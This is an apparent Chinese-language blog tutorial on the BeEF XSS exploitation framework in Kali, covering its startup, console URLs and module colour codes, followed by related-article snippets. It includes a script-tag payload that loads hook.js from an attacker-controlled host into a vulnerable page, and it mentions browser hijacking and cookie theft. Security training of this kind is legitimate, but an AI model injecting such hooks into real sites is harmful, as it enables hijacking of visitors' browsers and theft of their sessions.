beef介绍

XSS 漏洞的利用平台，kali 自带

beef 的启动

Kali 中

工具目录 /usr/share/beef-xss

配置文件 config.yaml

启动 beef 工具的方法

1）beef-xss

2） /usr/share/beef-xss/beef

注：在启动前需要修改默认用户名及密码（config.yaml），否则会启动失败。

Web 界面管理控制台：http://192.168.11.167:3000/ui/panel

Shellcode：http://192.168.11.167:3000/hook.js

测试页面：http://192.168.11.167:3000/demos/butcher/index.html

beef 的应用

确认有XSS漏洞后可利用网页重定向使其跳转至指定网页

<script src="http://192.168.11.167:3000/hook.js"></script>

1）浏览器劫持

命令模块：绿色模块：表示模块适合目标浏览器，并且执行对客户端不可见橙色模块：表示模块可用，但是对用户可见（CAM弹框申请权限）红色模块：表示模块不适用与当前用户，有些红色模块可以正常执行灰色模块：模块未在目标浏览器上测试过

2）Cookie 窃取与欺骗 -- 固定会话攻击

。。。。。。

XSS 工具之 beef相关推荐

（28）【xss工具绕过】xss之burpsuite、前端、字典……
目录 burpsuite抓包方法一:对数据进行模糊测试方法二:安装插件,进行xss漏洞检测 XSS Validator 前端绕过 X-frame被忽略情况原理: 取值: 利用: 使用DOM型XS ...
web安全----xss工具使用3
XSSer 0x01 安装环境:kali.python3(必须是python3,kali默认为python2) 安装步骤: git clone https://github.com/epsylon/ ...
【干货】XSS知识总结
公众号:白帽子左一 XSS基础跨站脚本(英语:Cross-site scripting,通常简称为:XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种.它允许恶意用户将代码注入到网页上,其他 ...
怎样利用超图客户端打点_渗透测试——XSS利用工具BeEF攻击演示
跨站脚本漏洞(Cross-site scripting,通常简称为XSS)发生在客户端,可被用于进行窃取隐私.钓鱼欺骗.窃取密码.传播恶意代码等攻击.XSS攻击使用到的技术主要为HTML和Javasc ...
一个好玩的工具BeEF介绍
beef BeEF-XSS是一款非常强大的web框架攻击平台,集成了许多payload,可以实现许多功能 BeEF-XSS可以说是最强大的XSS漏洞利用工具,可以收集浏览器信息.键盘记录.社会工程等 ...
网络渗透测试实验三 XSS和SQL
网络渗透测试实验三 XSS和SQL注入实验目的:了解什么是XSS:思考防御XSS攻击的方法:了解SQL注入的基本原理:掌握PHP脚本访问MySQL数据库的基本方法:掌握程序设计中避免出现SQL注入漏 ...
网络安全中的NISP-SO安全运维工程师都需要那些工具?
网络安全运维工程师的实用工具有那些 1.掌握安全运维所必须的资产梳理工具(Layer.御剑.nmap.dirb.wafw00f) 2.掌握安全运维利器流量抓包工具(Wireshark.burpsuit ...
实验三 XSS和SQL注入
实验三 XSS和SQL注入实验目的:了解什么是XSS:了解XSS攻击实施,理解防御XSS攻击的方法:了解SQL注入的基本原理:掌握PHP脚本访问MySQL数据库的基本方法:掌握程序设计中避免出现SQ ...
XSS学习笔记(未完)
XSS基础学习 1. XSS 1.1 客户端Cookie: 1.2 XSS攻击类型 1.3 工具/平台 1.4 利用方式 1.4.1 非手工方式 1.4.1.1自动化攻击:beef 1.4.2 手工方 ...
XSS（Cross-site Script，跨站脚本）漏洞笔记
起源最早的 XSS 漏洞可追溯到 1999 年末,微软安全工程师发现一些网站遭到攻击,网站被插入了一些恶意脚本和图像标签.随后,微软对此类漏洞进行研究分析,并在 2000 年 1 月,正式使用&qu ...

XSS 工具之 beef